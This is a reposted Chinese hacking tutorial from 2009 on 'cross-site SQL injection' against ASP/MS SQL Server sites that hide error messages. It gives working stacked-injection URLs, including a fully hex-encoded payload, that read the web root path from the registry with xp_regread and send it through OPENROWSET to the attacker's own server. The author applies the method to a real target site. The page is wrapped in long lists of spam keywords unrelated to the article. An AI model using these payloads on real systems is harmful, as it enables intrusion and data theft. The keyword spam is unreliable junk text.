国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

跨站式SQL注入技巧
2009-01-03   

前一階段,在嘗試攻擊一個(gè)網(wǎng)站的時(shí)候,發(fā)現(xiàn)對方的系統(tǒng)已經(jīng)屏蔽了錯(cuò)誤信息,用的也是普通的帳號連接的數(shù)據(jù)庫,系統(tǒng)也是打了全部的補(bǔ)丁這樣要攻擊注入是比較麻煩的。。因此我自己搞了一種“跨站式SQL注入”。。
思路如下,既然你不顯示錯(cuò)誤信息,我能不能讓你顯示到別的地方呢?讓SQL把錯(cuò)誤寫入別的地方。。。
既然是研究階段,我們最好不要直接注入網(wǎng)站,而是首先用查詢分析器來分析這個(gè)方法。。
第一個(gè)想法:
SQL可以連接外部的數(shù)據(jù)庫。。
于是,首先用查詢分析器,登陸到我自己的一個(gè)虛擬主機(jī)的數(shù)據(jù)庫(這樣的權(quán)限比較小),然后在本地啟動一個(gè)SQL server,并且用SA的身份在SQL事件探測器里邊建立一個(gè)跟蹤。  
嘗試 sp_addlinkedserver 如果成功,那就和操作本地?cái)?shù)據(jù)庫一樣了。。  
提示必須是sysadmin的身份。。失敗。 
換一個(gè)思路:
只要你SQL敢發(fā)命令過來,我不管執(zhí)行的結(jié)果怎么樣,只要接獲到命令就可以了。。  
于是考慮到一個(gè)權(quán)限要求不是很高的命令:OPENROWSET 來跨服務(wù)器查詢。。這個(gè)命令作用是把一個(gè)數(shù)據(jù)庫命令發(fā)給遠(yuǎn)程的數(shù)據(jù)庫,取回來結(jié)果集。。于是就啟動“事件跟蹤”監(jiān)視發(fā)過來的命令。。  
第一次嘗試,首先還是執(zhí)行 create table [dbo].[laokai]([cha8][char](255))--建立一個(gè)表。隨后是把路徑寫入數(shù)據(jù)庫,這里我考慮,直接生成一個(gè)跨庫的腳本算了。好方便執(zhí)行。。
DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''你的IP'';''sa'';''密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
這段代碼什么意思哪?就是把網(wǎng)站的路徑信息寫入數(shù)據(jù)庫。。也不是單純的寫,寫得同時(shí)構(gòu)造一個(gè)SQL語句,這個(gè)語句的執(zhí)行結(jié)果是給laokai這個(gè)數(shù)據(jù)庫的cha8字段增加了這樣的一行記錄。  
SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''C:\Inetpub,,1''')AS a
其中的C:\Inetpub,,1就是注冊表記錄的根目錄,最后要做的是:
DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--
這樣就等于執(zhí)行了
SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''C:\Inetpub,,1''')AS a
這一條語句。。。同時(shí)你會在事件探測器那邊會顯示  
SELECT * FROM pubs.dbo.authors where au_fname='C:\Inetpub,,1'
其中的C:\Inetpub 就是網(wǎng)站的路徑。。調(diào)試成功。。  
現(xiàn)在進(jìn)入實(shí)戰(zhàn)階段。。某網(wǎng)站屏蔽了全部出錯(cuò)信息。。但是我們可以確定它存在注入點(diǎn) a.asp?id=1,怎么做呢?
a.asp?id=1;create table [dbo].[laokai]([cha8][char](255))--
返回正常,我們建立了一個(gè)叫l(wèi)aokai的表,有個(gè)字段叫cha8,然后:
a.asp?id=1;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''你的IP'';''sa'';''密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
出錯(cuò)了。。出錯(cuò)信息被屏蔽了。。怎么辦?經(jīng)過研究發(fā)現(xiàn)是里邊的某些字符例如 +號需要轉(zhuǎn)化成16進(jìn)制。。或許還有別的地方要轉(zhuǎn)化。。怎么辦啊?
于是寫了一個(gè)ASCII轉(zhuǎn)化16進(jìn)制的工具,把全部的代碼轉(zhuǎn)化一下,然后注入就OK了。。(工具的地址 http://www.cha8.com/ascii.rar 麻煩放入光盤,不要讓他們下,我的服務(wù)器受不了),最后自然是執(zhí)行上述語句了。。
a.asp?id=1;%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%65%78%65%63%20%6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%4F%4E%54%52%4F%4C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%20%2C%40%72%65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%6C%61%6F%6B%61%69%20%28%63%68%61%38%29%20%76%61%6C%75%65%73%28%27%53%45%4C%45%43%54%20%61%2E%2A%20%46%52%4F%4D%20%4F%50%45%4E%52%4F%57%53%45%54%28%27%27%53%51%4C%4F%4C%45%44%42%27%27%2C%27%27%3F%3F%49%50%27%27%3B%27%27%73%61%27%27%3B%27%27%3F%3F%27%27%2C%20%27%27%53%45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%70%75%62%73%2E%64%62%6F%2E%61%75%74%68%6F%72%73%20%77%68%65%72%65%20%61%75%5F%66%6E%61%6D%65%/33.shtml' target='_blank' class='article'>3D%27%27%27%27%27%20%2B%20%40%72%65%73%75%6C%74%20%2B%20%27%27%27%27%27%27%27%29%41%53%20%61%27%29%3B%2D%2D%20
執(zhí)行成功。。。
a.asp?id=1;DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--
網(wǎng)站那邊顯示還是正常頁面。。但是你這邊的事件探測器那邊會顯示:



注入成功。。后邊知道了絕對路徑,如何添加的文章就很多了。。這里就不再描述了。。
最后說明一下:這只是一個(gè)新型的攻擊思路的講解,讓大家通過另外一種方式把數(shù)據(jù)庫里邊的數(shù)據(jù)取出來。。
''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''' 部分,修改成insert把數(shù)據(jù)加入數(shù)據(jù)庫也應(yīng)該沒有問題。。甚至單獨(dú)保留 @result 都沒問題。。不過這樣那邊會出錯(cuò)。這邊就留下一個(gè)exec 'C:\Inetpub,,1'

熱詞搜索:

上一篇:數(shù)據(jù)庫下載漏洞攻擊技術(shù)
下一篇:對一個(gè)大型網(wǎng)絡(luò)硬盤營業(yè)站點(diǎn)的測試

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产亚洲免费的视频看| 国产一区二区三区四区五区美女 | 麻豆精品视频在线观看| 国产精品白丝jk黑袜喷水| 伊人成年综合电影网| 久久久久久网站| 精品电影一区| 欧美寡妇偷汉性猛交| 亚洲精品日韩精品| 欧美视频亚洲视频| 午夜精品久久久久久99热| 激情欧美一区二区三区| 亚洲欧美日韩精品久久奇米色影视 | 红桃视频一区| 久久九九有精品国产23| 极品尤物av久久免费看| 欧美jjzz| 午夜精品在线观看| 亚洲国产国产亚洲一二三| 欧美久久久久久蜜桃| 99热在这里有精品免费| 国产午夜精品美女毛片视频| 老司机久久99久久精品播放免费 | 欧美午夜宅男影院在线观看| 亚洲欧美日韩在线一区| 亚洲激情成人网| 国产欧美一区二区三区视频| 免费在线亚洲| 久久精品免费电影| 一本色道久久88综合日韩精品 | 国产精品高潮呻吟视频| 久久青草福利网站| 亚洲欧美三级在线| 亚洲黄色大片| 韩国在线一区| 国产欧美一区二区三区久久| 欧美福利网址| 欧美一区二区久久久| 亚洲一二三四区| 一区二区三区四区五区视频| 亚洲福利视频网站| 韩日视频一区| 精品成人一区二区三区四区| 国产精品揄拍一区二区| 欧美日韩综合在线免费观看| 欧美不卡在线| 久久手机免费观看| 久久久无码精品亚洲日韩按摩| 欧美一区二区性| 久久爱另类一区二区小说| 欧美一进一出视频| 欧美在线视频一区二区三区| 久久精品国产综合精品| 久久久久成人精品| 浪潮色综合久久天堂| 久久久精品tv| 欧美激情精品久久久久久大尺度| 欧美成年人视频| 欧美日韩黄色一区二区| 国产精品日韩欧美一区二区三区 | 国产精品扒开腿做爽爽爽软件| 欧美日韩在线大尺度| 国产麻豆视频精品| 亚洲第一精品在线| 在线视频一区观看| 久久网站免费| 久久久无码精品亚洲日韩按摩| 欧美成人黑人xx视频免费观看| 欧美日韩不卡在线| 国产精品久久久久秋霞鲁丝| 欧美日韩国产精品一区二区亚洲| 国产精品毛片大码女人| 在线精品亚洲一区二区| 亚洲一级在线观看| 欧美精品自拍| 精品电影在线观看| 午夜精品免费| 国产精品久久久久久久久久直播 | 久久在线视频| 国产精品男女猛烈高潮激情| 一区二区在线不卡| 欧美在线视频一区| 国产精品一级| 亚洲一区二区三区国产| 欧美精品激情| 亚洲黄色三级| 老鸭窝91久久精品色噜噜导演| 国产亚洲观看| 久久久97精品| 激情综合网址| 久久亚洲色图| 永久91嫩草亚洲精品人人| 久久精品亚洲国产奇米99| 国产午夜精品全部视频播放| 亚洲欧美第一页| 国产片一区二区| 午夜亚洲视频| 激情成人综合网| 欧美福利电影网| 99国产精品久久久久久久成人热| 欧美黑人多人双交| 一区二区三区|亚洲午夜| 国产精品国产三级国产普通话99 | 欧美精品亚洲精品| 中日韩视频在线观看| 国产美女精品人人做人人爽| 久久久999精品免费| 国产欧美日韩一区| 免费成人在线观看视频| 亚洲高清激情| 欧美日韩极品在线观看一区| 亚洲已满18点击进入久久| 国产精品系列在线| 欧美成人tv| 小黄鸭精品aⅴ导航网站入口| 好吊一区二区三区| 欧美a级一区二区| 欧美在线三级| 亚洲视频在线看| 亚洲国产综合在线| 国产一区二区三区免费不卡| 欧美日本一道本| 久久激情视频免费观看| 一区二区电影免费观看| 经典三级久久| 国产自产精品| 国产精品日韩专区| 欧美色区777第一页| 欧美www在线| 久久国产乱子精品免费女| 亚洲欧洲在线一区| 欧美三级午夜理伦三级中文幕 | 亚洲人在线视频| 国产一区二区三区四区hd| 国产精品制服诱惑| 欧美午夜在线| 欧美色综合网| 欧美日韩国产精品一区二区亚洲| 国产亚洲一区二区在线观看| 91久久夜色精品国产九色| 国产精品美女久久久浪潮软件| 麻豆视频一区二区| 欧美在线网站| 一区二区冒白浆视频| 国产亚洲精久久久久久| 欧美日韩1080p| 香蕉久久夜色| 免费在线播放第一区高清av| 有坂深雪在线一区| 欧美成人精品在线观看| 午夜久久tv| 99视频一区二区三区| 一区二区三区黄色| 国内成+人亚洲| 国产精品久久中文| 欧美三级特黄| 久久久久久穴| 一区二区三区在线看| 国产精品理论片| 欧美a级片一区| 久久成人综合网| 在线观看亚洲视频| 国产欧美日韩在线观看| 欧美黄色片免费观看| 欧美大片在线观看一区| 久久久久亚洲综合| 欧美在线亚洲在线| 91久久久在线| 亚洲国产高清高潮精品美女| 韩国一区二区三区美女美女秀| 国产精品久久久久久久久免费樱桃| 欧美激情麻豆| 欧美日韩在线播放一区二区| 欧美日韩成人综合天天影院| 欧美成人综合在线| 国产精品高潮粉嫩av| 国产日韩精品在线播放| 亚洲国产精品成人精品| 99热精品在线| 久久久久国产精品一区二区| 欧美亚洲色图校园春色| 久久夜精品va视频免费观看| 欧美精品入口| 国产日韩欧美三级| 亚洲婷婷国产精品电影人久久| 国产精品你懂的在线欣赏| 欧美大胆成人| 国产精品一区免费视频| 在线不卡免费欧美| 亚洲日本激情| 久久婷婷av| 国产偷国产偷精品高清尤物| 一区二区日韩欧美| 免费观看国产成人| 亚洲每日在线| 国产欧美91| 久久亚洲精品视频| 日韩午夜视频在线观看| 欧美日本国产| 亚洲欧美国产高清|